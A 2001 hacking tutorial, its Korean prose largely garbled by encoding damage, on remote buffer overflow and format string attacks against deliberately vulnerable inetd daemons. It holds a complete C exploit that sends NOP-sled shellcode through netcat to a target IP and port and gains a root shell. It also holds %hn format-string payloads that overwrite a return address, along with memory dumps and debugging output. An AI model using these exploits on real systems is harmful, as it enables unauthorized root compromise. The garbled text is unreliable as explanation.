|================================================================| Title: Remote Buffer Overflow & Format String :-) Author : (Xpl017Elz) E-mail : szoahc@hotmail.com Home: http://x82.i21c.net Date: f. 2001/10/11 s. 2001/10/23 t. 2001/11/09 |================================================================| 0x00. 0x01. - 0x0100000a. Ŭ̾Ʈ (Client & Server) - 0x0100000b. Ʈ (port) - 0x0100000c. Ŷ (packet) - 0x0100000d. (Daemon) 0x02. - 0x0200000a. Remote - 0x0200000b. Server - 0x0200000c. ݿ ̿ Daemon - 0x0200000d. ߰ 0x03. Remote Buffer Overflow - 0x0300000a. finding - 0x0300000b. exploit - 0x0300000c. stack debugging 0x04. Remote Format String - 0x0400000a. finding - 0x0400000b. exploit - 0x0400000c. stack debugging 0x05. |================================================================| 0x00. ̹, Internet û source exploit scripts kids ߱ ִ. , ƴҰ̶ Ѵ. ε ݿ Ͻð ô е鲲 remote attack ظ µ Ǿ Ѵ. ϰų ִºκ ڿ mail ֱ ... ׷, Ŀ ˾ƺ . 0x01. Network ̳ ˰̴. , õҶ Network ൿ ؾ ϴºκ ִ. ݻӸ ƴ϶ OS programming Ҷ ׾Ƶθ ȴ ;-) 켱, Network ϰڴ. Network, żο ConnectionǾ ִ Series node, connection point ǹѴ. Network ٸ Network Connection ְ, Sub Network ִ. Network Ÿ LAN (local area network), MAN (metropolitan area network), WAN (wide area network) . 0x0100000a. Ŭ̾Ʈ (Client & Server) Client & Server ǻ Program ̿ ̷ 踦 Ÿ ̴. Client ٸ Program 񽺸 ûϴ Program̸, û ִ Program̴. Client & Server ǻ , Network ȯ濡 ū ǹ̸ . Network 󿡼 Client & Server model ٸ лǾ ִ Program Connection ִ Ѵ. Ϲ Client & Server model, (daemon)̶ Ҹ Program Ȱȭ ¿ Client 䱸 ٸµ, ü ټ Client Program ϳ Server Program Ѵ. ̿Ͱ Network ؼ ʿ ΰ ٷ, port̴. 0x0100000b. Ʈ (port) port Ҷ ϸ, Internet Protocol TCP/IP Client Program Network Ư Server Program ϴ ȴ. Protocol HTTP , TCP/IP Protocol ϴ Program ̸ portȣ ִ. ̷ ͵ IANA Ǿ, ˷ port̶ Ҹ. portȣ 0 65536 ̴. portȣ 0 1024  Ư Service ɼ ֵ Ǿ ִ. 0x0100000c. Ŷ (packet) Packet̶ data ȣ ȣ Ե 2, Ʈ ׷ ϴµ, Ư Packetȯ Ŀ ͸ Packet̶ ⺻ ͸ Ͽ , ٽ data Ͽ óѴ. ̷ν, 츮 ˾ƾ ⺻ Ͱ. ٵ ̷ ǹ ɰ̴. ? Ʈũ Ͽ°? ̴. ̴, 츮 ˾ƾ remote ݿ ϱ ̴. ˰ִ localݰ ٸ ̹ ˰ϴ. , Daemon 丸 κ  ϰڴ. 0x0100000d. (Daemon) Daemon ֱ Service û óϱ Linux Unix(, Server) Ǵ Program Ѵ. , 䱸 Ǵٸ Program̳ Process ó ֵ Ѵ. 0x02. κп ٷ鳻 ݵ صα ٶ. ɽġ ݺκ ַ ұ Ѵ. remote غִ. 0x0200000a. Remote fi) Server Ư Daemon ϰִ Buffer Overflow . se) Ư Daemon ϰ ִ Format String . th) Ÿ, ҷ Daemon Program. غִ Overflow Daemon Format String Daemon غ. ⼭ Overflow Format String ϰ ʹٸ, Ʒ ϱ ٶ. http://www.zdnet.com/eweek/stories/general/0,11011,2605669,00.html http://www.networkmagazine.com/article/NMG20000511S0015 http://julianor.tripod.com/usfs.html http://my.dreamwiz.com/hackingm/lecture/Overflow.txt http://my.dreamwiz.com/hackingm/lecture/f0rm47_s7r1n9.txt remote Ϸ, Server 2밡 ʿϴ. Ѵ뿡 localhost loopback ̿ص , ٸ memory stack ý ϴ. 0x0200000b. Server 켱, ݴ host ̴. [x82@xpl017elz x82]$ uname -a Linux xpl017elz.org 2.2.14-5.0 #1 Thu Mar 16 02:23:03 KST 2000 i586 unknown [x82@xpl017elz x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@xpl017elz x82]$ gdb -v GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". [x82@xpl017elz x82]$ Ʒ, ݽõ host ̴. [x82@testsub x82]$ uname -a Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown [x82@testsub x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@testsub x82]$ gdb -v GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". [x82@testsub x82]$ 0x0200000c. ݿ ̿ Daemon Daemon Ѵ. е Ͽ, inetd ̿Ͽ ֵ Ͽ. [root@xpl017elz tmp]$ cat /etc/inetd.conf tfido stream tcp nowait root /var/tmp/daemon daemon [root@xpl017elz tmp]$ 60177(tfido service) /var/tmp/daemon ̶ ϰ ξ. tcp port· root ̸ Ѵ. , Overflow Daemon α׷ Source ̴. main() { char exec[600]; fgets(exec,700,stdin); } Source 캸, fgets() Լ 100 ڿ Ƿν 迭 ÷ο찡 ߻ϴ° ˼ִ. (fgets(...,700,...); <-- ̺κп ÷ο츦 ߱) , Format String Daemon α׷ Source ̴. main() { char bug[500]; fgets(bug,500,stdin); printf(bug); } Source printf() Լ ϴ Format string ´. (printf(bug); <-- ̺κп ȯڸ ʰ Է¹޴ ü Ѵ) local ݻ󿡼 stack address shellcode address code Ͽ ̵ ־. remote ݵ ̿ shell ° иϴ. , local ݵ߿ ϳ eggshell α׷ Ҽ¾. ſ (밡?) μ, remote ̷ ִ°̴. ޴ daemon Ư¡ ڷ Է ޴´ٴ̴. ٷ ̺κп ڰ ̿Ҽ ִ service  츮 ϴ ޼ ɼ Եȴ. , Է ƴϴ Ͼ ִ. local glibc 쿡 Է ƴ locale ̿ Է shell . ( ߰ ƴҼ) , 츮 ʰ Daemon ̿ϴ°̹Ƿ... :-) (̻ ʿ ) ~ ׷, Է ٸ daemon ̿ 츮 ϴ ޼غ . 0x0200000d. ߰ remote ݽÿ ȯ濡 Ѵ. remote 󿡼 host stack debuggingϴ ۾ Ҽ , 밡 õ KnowHow ̿ؾ Ѵ. ׷Ƿ, ̷ ̴. Ͽ, 츮 ȯ ſ simpleϰ, ȯ̳ ϴ ¿ Ұ̴. exploit c programming ̿Ұ̸, stack 뺯 Ȯ debugging ƴ ܺο µǵ code dumpϿ 캸 Ұ̴. 0x03. Remote Buffer Overflow 켱, Remote Buffer Overflow غô. Ʒ ܺ Server Target Server telnet غ̴. [x82@testsub x82]$ id uid=501(x82) gid=501(x82) groups=501(x82) [x82@testsub x82]$ telnet xxx.xx.xx.xx 60177 Trying xxx.xx.xx.xx... Connected to xxx.xx.xx.xx. Escape character is '^]'. 0x0300000a. finding Overflow Ͼ ܺο ɼ ʴ. , Ȯ ° ˾Ƴ ϴ ϰ̴. κ Remote testing ڽ Server localhost loopback õѴ. ο Server ܺθ ϴ°̱ Ϲ Remote ݰ ٸ Debugging Ҽ ִ°̴. α׷߿ ϳ ltrace̴. α׷ ̿ ǰ ִ daemon μ ġϿ 캸, Overflow Ͼ , ġ address  Ǵ ľҼ ְԵȴ. ̷ν exploit, ִ ٸ ý ǿ ϸ, ݼ ſ. (, ) ̿ : [root@xpl017elz /tmp]# ltrace -p 788 -o /tmp/ltracing & # 788 = Daemon process [1] 792 [root@xpl017elz /tmp]# (printf "\~\~\~ format string \~\~\~";cat) | nc 127.0.0.1 port [1]+ Done ltrace -p 788 -o /tmp/ltracing [root@xpl017elz /tmp]# cat /tmp/ltracing 788 svc_getreqset(0xbffffcac, 256, 0xbffffd94, 0, 0x400f2398 788 xdr_string(0x08051008, 0xbffff6ec, 1024, 0x400d6d63, 0x08051008) = 1 788 gethostbyname(0x08052220, 0xbffff6ec, 0x080498b8, 0xbffff6ec, 0xbffffc34)=0 788 vsnprintf(0xbffff2b8, 1024, 0x0804d309, 0xbffff6c4, 0xbffff6ec) = 1023 788 syslog(5, 0xbffff2b8, 0xbffff6ec, 0x0804a658, 0x90909090 788 --- SIGSEGV (Segmentation fault) --- ( ᰡ Ͼ.) 788 +++ killed by SIGSEGV +++ ̷ؼ ˾Ƴ Ͽ ϴ Remote attack Ѷ, ߴ Rpc statd ̿. string() Լ Ͼ Overflow , ó Ͽ, , õغ ִ. ٸ Source Ͽ ˾ƺ ڿ 512 ڿ Է 4byteĿ Segmentation fault Ͼ°ͱ ˾ƺ ־. [root@xpl017elz tmp]# [2]- Done ltrace -p 5213 -o /tmp/debug [root@xpl017elz tmp]# cat /tmp/debug 5213 strcpy(0xbffff900, "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"...) = 0xbffff900 5213 --- SIGSEGV (׸̼ ) --- 5213 +++ killed by SIGSEGV +++ [root@xpl017elz tmp]# dumpcode ̿Ͽ, address оͺ. [x82@testsub x82]$ telnet xxx.xx.xx.xx 60177 Trying xxx.xx.xx.xx... Connected to xxx.xx.xx.xx. Escape character is '^]'. 0xbffffb00 0d 0a 00 40 a0 fd ff bf 68 fb ff bf 00 00 00 00 ...@....h....... 0xbffffb10 00 00 00 00 00 00 00 00 00 00 00 00 90 20 01 40 ............. .@ 0xbffffb20 07 00 00 00 f0 93 00 40 18 00 00 00 58 fb ff bf .......@....X... 0xbffffb30 54 fb ff bf 50 fb ff bf 30 02 00 40 00 00 00 00 T...P...0..@.... 0xbffffb40 00 00 00 00 94 fd ff bf 02 00 00 00 00 00 00 00 ................ 0xbffffb50 14 13 00 40 c8 02 00 00 00 00 00 00 00 00 00 00 ...@............ 0xbffffb60 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 ...........@.... 0xbffffb70 8c 21 01 40 00 00 00 00 00 00 00 00 00 00 00 00 .!.@............ ... ߷ ... 0xbffffda0 01 00 00 00 84 fe ff bf 00 00 00 00 8b fe ff bf ................ 0xbffffdb0 a6 fe ff bf b1 fe ff bf bc fe ff bf ca fe ff bf ................ 0xbffffdc0 fc fe ff bf 11 ff ff bf 18 ff ff bf 24 ff ff bf ............$... 0xbffffdd0 2f ff ff bf 3f ff ff bf 4a ff ff bf 5b ff ff bf /...?...J...[... 0xbffffde0 68 ff ff bf 70 ff ff bf 7c ff ff bf 00 00 00 00 h...p...|....... 0xbffffdf0 03 00 00 00 34 80 04 08 04 00 00 00 20 00 00 00 ....4....... ... 0xbffffe00 05 00 00 00 06 00 00 00 06 00 00 00 00 10 00 00 ................ 0xbffffe10 07 00 00 00 00 00 00 40 08 00 00 00 00 00 00 00 .......@........ Connection closed by foreign host. ? Remote ̷ ø :-( ϴ daemon Source(daemon.c) 캸, exec 600byte Է ebp 4byte ٷ Return address Ѵ. ׷Ƿ, 600byte shellcode Է Է shellcode ּҸ Return address Ǵ°̴. ̰ ȭϿ Ÿ, . +------------+ +-----------+ +-------------+ | exec | | e b p | | Return add | +------------+ +-----------+ +-------------+ |__________| |_________| |_________| | | | 600byte 4byte 4byte 0x0300000b. exploit ų Stack : [NNNNNN...NNNNNNNSSSS...SSSSXXXX...XXXXXX&shellcode] NOP = 250byte (0xbffffb00 ~ 0xbffffbf9) shellcode = 24byte (0xbffffbfa ~ 0xbffffc11) etcvalues = 330byte (0xbffffc12 ~ 0xbffffd5b) shellcode address = 4byte (0xbffffd5c ~ 0xbffffd5f) : 608byte Overwrite (0xbffffb00 ~ 0xbffffd5f) Ͱ code dumping address ˾Ƴ ־. ϼ exploit: [x82@testsub x82]$ cat expl.c #include char exec [1000], *netcat = "/usr/local/bin/nc"; /* 츮 Ŷ α׷. κ nc ġ ٲ־ Ѵ. */ char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; /* shellcode ( 24byte ҿ) */ /* __asm__(" xorl %edx,%edx pushl %edx pushl $0x68732f6e pushl $0x69622f2f movl %esp,%ebx pushl %edx pushl %ebx movl %esp,%ecx leal 0xb(%edx),%eax int $0x80 "); */ main( int argc, char *argv[] ) { /* Է¹ IP(argv[1]) port(argv[2]) */ int score, score_ran, number; char allcode[1500]; /* code ۼ */ bzero ( &allcode, 1500 ); for ( score = 0; score <= (274-sizeof(shellcode)); score++ ) { allcode[score] = 0x90; /* 275byte shellcode ̸ NOP Ѵ. */ } for ( score_ran = 0, score = score; score_ran < (sizeof(shellcode)-1); score++, score_ran++ ) { allcode[score] = shellcode[score_ran]; /* Էµ 1byte ̳ʽ shellcode shellcode ִ´. */ } for ( number = 0; number <= 329; number++ ) { allcode[score++] = 0x20; /* Space Key */ /* 330byte 0x20 (̽) Ѵ. */ } /* 4byte ٷ Return Address ִ´. */ allcode[score++] = 0xf8; allcode[score++] = 0xfb; allcode[score++] = 0xff; allcode[score++] = 0xbf; /* 츮 shellcode ￵ 0xbffffbf8 ̶ ˾Ƿ, κ address Ͽ ־. */ printf("\n\n\t[Test] Remote Buffer Overflow Attack Exploit"); printf("\n\tMake by '\\x82\\x41\\xff\\xbf'\n\n"); if ( argc < 3 ) { /* μ ԷȮ */ printf("\tUsage: %s target[IP] target[PORT]\n",argv[0]); printf("\t Ex>: %s 127.0.0.1 60177\n\n",argv[0]); exit(0); } sprintf(exec,"( printf \"%s\"; cat ) | %s %s %s ",allcode,netcat,argv[1],argv[2] ); system(exec); /* User Է¹ ip,port Ѵ. , ۼ Ŷ netcat̶ α׷ ̿Ͽ Է¹ ȣƮ port Ѵ. */ } [x82@testsub x82]$ 0x0300000c. stack debugging ʴ´. ϰ nc ̿ Packet ִ°̴. exploit ̿ϸ, shell ִ. [x82@testsub x82]$ ./expl 211.59.28.75 60177 [Test] Remote Buffer Overflow Attack Exploit Make by '\x82\x41\xff\xbf' id uid=0(root) gid=0(root) groups=0(root) whoami root exit [x82@testsub x82]$ Debugging: 0xbffffb00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb20 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb30 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb40 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb50 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb70 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb80 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffba0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbb0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbc0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbd0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbe0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbf0 90 90 90 90 90 90 90 90 90 90 // NOP κ 31 d2 52 68 6e 2f ..........1.Rhn/ 0xbffffc00 73 68 68 2f 2f 62 69 89 e3 52 53 89 e1 8d 42 0b shh//bi..RS...B. 0xbffffc10 cd 80 // shellcode κ .. 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc40 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc50 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc60 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc80 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc90 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffca0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcb0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcc0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcd0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffce0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcf0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd10 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd40 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd50 20 20 20 20 20 20 20 20 20 20 20 20 // etcvalues κ f8 fb ff bf .... 0xbffffd60 0a 00 00 00 // &shellcode address id uid=0(root) gid=0(root) groups=0(root) exit ̷ν, Remote Buffer Overflow Ͽ. ׷, ̹ Remote Format String õغ. 0x04. Remote Format String Remote Buffer Overflow ݰ ȯ Ǿ. Ʒ ܺ Server Target Server telnet غ̴. [x82@testsub x82]$ id uid=501(x82) gid=501(x82) groups=501(x82) [x82@testsub x82]$ telnet xxx.xx.xx.xx 60177 Trying xxx.xx.xx.xx... Connected to xxx.xx.xx.xx. Escape character is '^]'. 0x0400000a. finding ߰ κп ߴͰ code dump ޾ƺ ִȯ Ͽ õϿ. gdb ǰ ִ μ ġص , ۾ ̷ڴ. 켱, 츮 ϴ target server  ˾ƺ. [x82@testsub x82]$ (printf "id";cat) | nc xxx.xx.xx.xx 60177 id 0xbffff7d4 69 64 0a 00 00 00 00 40 00 00 00 00 8c 21 01 40 id.....@.....!.@ 0xbffff7e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff7f4 00 00 00 00 c4 21 01 40 bc 21 01 40 94 21 01 40 .....!.@.!.@.!.@ 0xbffff804 9c 21 01 40 a4 21 01 40 00 00 00 00 00 00 00 00 .!.@.!.@........ 0xbffff814 00 00 00 00 ac 21 01 40 b4 21 01 40 00 00 00 00 .....!.@.!.@.... 0xbffff824 00 00 00 00 8c 21 01 40 d8 a4 02 40 00 f9 ff bf .....!.@...@.... 0xbffff834 86 79 00 40 ac a4 02 40 ac a4 02 40 24 20 01 40 .y.@...@...@$ .@ 0xbffff844 a8 2b 01 40 0d 43 00 00 24 20 01 40 a8 2b 01 40 .+.@.C..$ .@.+.@ 0xbffff854 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff864 00 00 00 00 00 00 00 00 b0 3a 00 00 00 00 00 00 .........:...... 0xbffff874 00 00 00 00 00 00 00 00 00 00 00 00 24 f7 01 40 ............$..@ 0xbffff884 ab 03 00 00 64 2a 02 40 74 bc 01 40 a8 2b 01 40 ....d*.@t..@.+.@ 0xbffff894 d8 a4 02 40 68 f9 ff bf 86 79 00 40 ac a4 02 40 ...@h....y.@...@ 0xbffff8a4 88 82 04 08 24 20 01 40 b0 26 01 40 6e 00 00 00 ....$ .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 40 ..w.....`......@ 0xbffff954 a8 2b 01 40 77 ff ff bf c0 f9 ff bf 1f 00 00 00 .+.@w........... 0xbffff964 ec 7b 10 40 a0 f9 ff bf 9d 9f 00 40 c7 03 01 40 .{.@.......@...@ 0xbffff974 48 2e 01 40 07 00 00 00 ee 9e 00 40 1c 97 04 08 H..@.......@.... 0xbffff984 00 a6 00 40 14 fa ff bf b0 26 01 40 f4 81 04 08 ...@.....&.@.... 0xbffff994 28 97 04 08 72 82 04 08 f4 26 02 40 c8 f9 ff bf (...r....&.@.... 0xbffff9a4 10 a1 00 40 4b 80 0f 40 1c 97 04 08 00 a6 00 40 ...@K..@.......@ 0xbffff9b4 14 fa ff bf c8 f9 ff bf 4b 84 04 08 08 97 04 08 ........K....... 0xbffff9c4 1c 97 04 08 e8 f9 ff bf fb 11 03 40 01 00 00 00 ...........@.... 0xbffff9d4 14 fa ff bf 1c fa ff bf ........ [x82@testsub x82]$ ٽ , Ϲ ̷ ݿ α׷ . --; target server Stack "id\n" (69 64 0a) push Ǿ. format string Overflow ϰ, 鿡 ٹ ٸ. daemon fgets() Լ ˻縦 ϴ Լ̹Ƿ Overflow ʴ´. , ϴ κ printf() Լ 츮 ϴ° ̷ ش. ݽ Ǵ code format string (ȯ) ̿Ͽ Stack pushѴ. ѹ, testing 캸 ٶ. [x82@testsub x82]$ (printf "AAAA %%x %%x %%x %%x";cat) | nc xxx.xx.xx.xx 60177 AAAA 41414141 20782520 25207825 78252078 0xbffff7d4 41 41 41 41 25 78 25 78 25 78 25 78 0a 00 01 40 AAAA%x%x%x%x...@ 0xbffff7e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff7f4 00 00 00 00 c4 21 01 40 bc 21 01 40 94 21 01 40 .....!.@.!.@.!.@ 0xbffff804 9c 21 01 40 a4 21 01 40 00 00 00 00 00 00 00 00 .!.@.!.@........ 0xbffff814 00 00 00 00 ac 21 01 40 b4 21 01 40 00 00 00 00 .....!.@.!.@.... 0xbffff824 00 00 00 00 8c 21 01 40 d8 a4 02 40 00 f9 ff bf .....!.@...@.... 0xbffff834 86 79 00 40 ac a4 02 40 ac a4 02 40 24 20 01 40 .y.@...@...@$ .@ 0xbffff844 a8 2b 01 40 0d 43 00 00 24 20 01 40 a8 2b 01 40 .+.@.C..$ .@.+.@ 0xbffff854 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff864 00 00 00 00 00 00 00 00 b0 3a 00 00 00 00 00 00 .........:...... 0xbffff874 00 00 00 00 00 00 00 00 00 00 00 00 24 f7 01 40 ............$..@ 0xbffff884 ab 03 00 00 64 2a 02 40 74 bc 01 40 a8 2b 01 40 ....d*.@t..@.+.@ 0xbffff894 d8 a4 02 40 68 f9 ff bf 86 79 00 40 ac a4 02 40 ...@h....y.@...@ 0xbffff8a4 88 82 04 08 24 20 01 40 b0 26 01 40 6e 00 00 00 ....$ .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 40 ..w.....`......@ 0xbffff954 a8 2b 01 40 77 ff ff bf c0 f9 ff bf 1f 00 00 00 .+.@w........... 0xbffff964 ec 7b 10 40 a0 f9 ff bf 9d 9f 00 40 c7 03 01 40 .{.@.......@...@ 0xbffff974 48 2e 01 40 07 00 00 00 ee 9e 00 40 1c 97 04 08 H..@.......@.... 0xbffff984 00 a6 00 40 14 fa ff bf b0 26 01 40 f4 81 04 08 ...@.....&.@.... 0xbffff994 28 97 04 08 72 82 04 08 f4 26 02 40 c8 f9 ff bf (...r....&.@.... 0xbffff9a4 10 a1 00 40 4b 80 0f 40 1c 97 04 08 00 a6 00 40 ...@K..@.......@ 0xbffff9b4 14 fa ff bf c8 f9 ff bf 4b 84 04 08 08 97 04 08 ........K....... 0xbffff9c4 1c 97 04 08 e8 f9 ff bf fb 11 03 40 01 00 00 00 ...........@.... 0xbffff9d4 14 fa ff bf 1c fa ff bf ........ [x82@testsub x82]$ format string ̿ 䱸ϸ, α׷ Stack ״ Ѵ. ⼭ AAAA ־ְ %x 䱸 Stack pushǴ ּҰ, Է µǴ ּҰ 󸶰 ϴ° ϴ Ѵ. %x 16 Ҷ ȴ. 16 ̷ Stack ϱ ؼε, %%x ù°  % Ȯ (printf "") ɳο format string νĽŰ ϱ ̴. α׷ غ̶ ⺻ ˰Ŷ Ѵ. "AAAA4141414178257825782578254001000a" Stack push Ǵ ּҰ µǴ ּҰ ʴ´. ̴ ϱ ſ ȯ̶ Ҽִ. Ѵٸ, %x ´ 4byte(0x 41 41 41 41) äν, ̰ Ȯ ġ ִ°̴. ׷ٸ ǽ . 츮 ׸ Ưּҿ  ִٸ, ̸ ų ̴. ƯּҴ code ־ format string պκп ְԵȴ. ּҴ %n Ƽ긦 ̿ Stack push ɰ̴. %n Ƽ պκп 츮 jump ؾ ּ(16 buffer ּҰ) 10 ȯϿ ˹ڿ ȴ. (⺻ "%1000d" ̷ ȯ ̶ ϸ ȴ. տ  1000̶ 16 10 ̴.) Ͽ exploit õغ. 0x0400000b. exploit տ jump ؾּҸ 10· Ͽ ° Ҽִ. 0xbfffef34 10 Ҽ ִ. 0x b : 16 x 16 x 16 x 16 x 16 x 16 x 16 x b(11) f : 16 x 16 x 16 x 16 x 16 x 16 x f(15) f : 16 x 16 x 16 x 16 x 16 x f(15) f : 16 x 16 x 16 x 16 x f(15) e : 16 x 16 x 16 x e(14) f : 16 x 16 x f(15) 3 : 16 x 3 4 : + 4 , 10 ũ 굵 ʴ. ׷Ƿ 2 Ѵ. (bfff/ef34) 굵 Ȯ ֱ κ format string ݽÿ äѴ. 1 + bfff : 114687 ef34 : 61236 1bfff - ef34 : 53451 bfff : 53451 ̷ 2 Ͽ 53451(bfff) 61236(ef34)  ־. ̷Ա 10  ? ϴ. ι ľ ̹Ƿ Ÿ ִ. "%61236d %hn %53451d %hn" (ef34)(push)(bfff)(push) %n 4byte , %hn 2byte Ѵ. ׷Ƿ ι Overwrite ų ִ°̴. %hn Ƽ %n Ƽ긦 ־ . , ϴ ּҿ . ǰ Ͽ.  ϴ ּ: 0xbffff894  ּ : 0xbfffef34 ׷, ! [x82@testsub x82]$ (printf "\x82\x82\x82\x82\x94\xf8\xff\xbf\x82\x82\x82\x82 \x96\xf8\xff\xbf%%61220d%%hn%%53451d%%hn";cat) | nc xxx.xx.xx.xx 60177 ... sleep ... ... sleep ... ... sleep ... -2105376126 0xbffff7d4 82 82 82 82 94 f8 ff bf 82 82 82 82 96 f8 ff bf ................ 0xbffff7e4 25 36 31 32 32 30 64 25 68 6e 25 35 33 34 35 31 %61220d%hn%53451 0xbffff7f4 64 25 68 6e 0a 00 01 40 bc 21 01 40 94 21 01 40 d%hn...@.!.@.!.@ 0xbffff804 9c 21 01 40 a4 21 01 40 00 00 00 00 00 00 00 00 .!.@.!.@........ 0xbffff814 00 00 00 00 ac 21 01 40 b4 21 01 40 00 00 00 00 .....!.@.!.@.... 0xbffff824 00 00 00 00 8c 21 01 40 d8 a4 02 40 00 f9 ff bf .....!.@...@.... 0xbffff834 86 79 00 40 ac a4 02 40 ac a4 02 40 24 20 01 40 .y.@...@...@$ .@ 0xbffff844 a8 2b 01 40 0d 43 00 00 24 20 01 40 a8 2b 01 40 .+.@.C..$ .@.+.@ 0xbffff854 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff864 00 00 00 00 00 00 00 00 b0 3a 00 00 00 00 00 00 .........:...... 0xbffff874 00 00 00 00 00 00 00 00 00 00 00 00 24 f7 01 40 ............$..@ 0xbffff884 ab 03 00 00 64 2a 02 40 74 bc 01 40 a8 2b 01 40 ....d*.@t..@.+.@ 0xbffff894 34 ef ff bf 68 f9 ff bf 86 79 00 40 ac a4 02 40 